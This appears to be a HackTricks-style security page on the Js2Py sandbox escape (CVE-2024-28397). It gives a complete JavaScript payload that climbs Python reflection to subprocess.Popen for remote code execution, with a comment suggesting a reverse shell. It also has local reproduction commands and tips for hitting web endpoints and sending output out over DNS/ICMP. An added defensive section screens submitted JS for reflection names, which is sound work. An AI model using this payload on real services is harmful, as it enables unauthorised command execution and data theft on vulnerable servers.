Js2Py sandbox escape (CVE-2024-28397)

Tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Js2Py translates JavaScript into Python objects, so even when js2py.disable_pyimport() is in effect, untrusted JS can traverse Python internals and reach dangerous classes such as subprocess.Popen. Versions ≤0.74 let an attacker abuse the Python reflection primitives that Js2Py exposes on JS objects to obtain RCE from "sandboxed" JavaScript.

## Primitive: pivoting from JS object wrappers to Python objects

  1. Obtain a Python-backed object: Object.getOwnPropertyNames({}) returns a dict_keys object from the Python side.
  2. Recover attribute access: take .__getattribute__ from that object and call it to read any attribute (for example, "__class__").
  3. Climb to object: from <class 'dict_keys'> read .__base__ to reach Python's base object class.
  4. Enumerate loaded classes: iterate object.__subclasses__() to walk every class already loaded in the interpreter.
  5. Locate subprocess.Popen: recursively search the subclasses for one whose __module__ == "subprocess" and __name__ == "Popen".
  6. Execute commands: instantiate Popen with attacker-controlled arguments and use .communicate() to capture the output.
Example payload that uses Js2Py to reach subprocess.Popen:

```javascript
// Replace cmd with desired payload (reverse shell / ping / etc.)
let cmd = "id";
let hacked, bymarve, n11;
let getattr, obj;

hacked = Object.getOwnPropertyNames({});   // -> dict_keys([])
bymarve = hacked.__getattribute__;
n11 = bymarve("__getattribute__");        // attribute access primitive
obj = n11("__class__").__base__;          // pivot to <class 'object'>
getattr = obj.__getattribute__;

function findpopen(o) {
  let result;
  for (let i in o.__subclasses__()) {
    let item = o.__subclasses__()[i];
    if (item.__module__ == "subprocess" && item.__name__ == "Popen") {
      return item;
    }
    if (item.__name__ != "type" && (result = findpopen(item))) {
      return result;
    }
  }
}

// Popen(cmd, stdin/out/err pipes...) then .communicate() for output
n11 = findpopen(obj)(cmd, -1, null, -1, -1, -1, null, null, true).communicate();
console.log(n11);
n11; // returned to caller if framework sends eval_js result back
```

Why this works: Js2Py exposes Python object wrappers to JS without stripping `__getattribute__`, `__class__`, `__base__`, or `__subclasses__`. `disable_pyimport()` only blocks an explicit `pyimport`; the chain above never imports anything new, it reuses modules and classes that are already loaded in memory.

## Reproducing the chain locally
```bash
# Js2Py 0.74 breaks on Python 3.12/3.13; pin 3.11 for testing
uv run --with js2py==0.74 --python 3.11 python - <<'PY'
import js2py
print(js2py.eval_js("Object.getOwnPropertyNames({})"))                      # dict_keys([])
print(js2py.eval_js("Object.getOwnPropertyNames({}).__getattribute__"))    # method-wrapper
print(js2py.eval_js("Object.getOwnPropertyNames({}).__getattribute__(\"__class__\")"))
print(js2py.eval_js("Object.getOwnPropertyNames({}).__getattribute__(\"__class__\").__base__"))
print(js2py.eval_js("Object.getOwnPropertyNames({}).__getattribute__(\"__class__\").__base__.__subclasses__()"))
PY
```

## Operating against web sandboxes

  • Any endpoint that feeds attacker-controlled JS into js2py.eval_js (for example, a Flask /run_code API) is immediately RCE if the process user has shell access.
  • Returning jsonify({'result': result}) will fail when .communicate() returns bytes; decode it, or send the output directly over DNS/ICMP to sidestep serialization constraints.
  • disable_pyimport() is not enough to stop this chain; hard isolation (a separate process/container) or removing Js2Py execution of untrusted code altogether is required.
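A defender-side companion to the bullets above, added here as an example and not code from the original page or from the Js2Py project: a pre-execution screen that flags the Python reflection names the chain depends on (`__getattribute__`, `__class__`, `__base__`, `__subclasses__`, `__module__`, `__name__`) in JS submitted to an eval_js endpoint, so the request can be rejected and logged before the interpreter ever sees it. `screen_js`, `guarded_eval_js`, `REFLECTION_NAMES` and the two sample snippets are assumptions of this example. It is a defense-in-depth signal, not a sandbox: the page's recommendation to run Js2Py in a separate process/container, or not to run untrusted JS through it at all, still applies.

```python
"""Screen untrusted JavaScript for Python dunder reflection names before it
reaches js2py.eval_js. Added example; hypothetical helper, not part of Js2Py."""
import re
from dataclasses import dataclass, field

# Dunder attributes that let JS walk from a wrapped Python object to arbitrary
# loaded classes. The first six are the names used by the chain above; the
# rest are closely related reflection hooks (assumed list, extend as needed).
REFLECTION_NAMES = frozenset({
    "__getattribute__", "__class__", "__base__", "__subclasses__",
    "__module__", "__name__",
    "__bases__", "__mro__", "__dict__", "__globals__", "__builtins__", "__import__",
})

# Matches any __identifier__ token. Quoted occurrences are covered too, because
# the chain passes names such as "__class__" as string arguments.
_DUNDER_RE = re.compile(r"__[A-Za-z_]+__")


@dataclass
class ScreenResult:
    allowed: bool
    findings: list = field(default_factory=list)  # (line_no, token) pairs


def screen_js(source: str) -> ScreenResult:
    """Return every reflection name found in `source`, with its line number."""
    findings = []
    for line_no, line in enumerate(source.splitlines(), start=1):
        for match in _DUNDER_RE.finditer(line):
            token = match.group(0)
            if token in REFLECTION_NAMES:
                findings.append((line_no, token))
    return ScreenResult(allowed=not findings, findings=findings)


def guarded_eval_js(source: str):
    """Evaluate `source` with js2py only if the screen passes.

    Hypothetical wrapper: js2py is imported lazily so the screen itself has no
    dependency, and a rejected request never touches the interpreter."""
    result = screen_js(source)
    if not result.allowed:
        raise ValueError(f"rejected untrusted JS, reflection names at: {result.findings}")
    import js2py  # assumed to be installed where this wrapper is deployed
    js2py.disable_pyimport()
    return js2py.eval_js(source)


# Constructed samples: a benign snippet and one mirroring the pivot steps above
# (stopping before any class lookup, since only the names matter for the screen).
BENIGN_JS = "function add(a, b) { return a + b; }\nadd(2, 3);"
CHAIN_JS = (
    "let h = Object.getOwnPropertyNames({});\n"
    'let g = h.__getattribute__("__getattribute__");\n'
    'let obj = g("__class__").__base__;\n'
    "obj.__subclasses__();"
)

if __name__ == "__main__":
    for label, src in (("benign", BENIGN_JS), ("chain", CHAIN_JS)):
        r = screen_js(src)
        print(label, "allowed" if r.allowed else f"blocked {r.findings}")
```

Wire `guarded_eval_js` in place of a bare `js2py.eval_js` call and forward `ScreenResult.findings` to the application log; the `(line, token)` pairs make a rejected request easy to triage. Because the screen is textual, treat a hit as a reason to block and investigate, and treat a miss as no evidence of safety.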
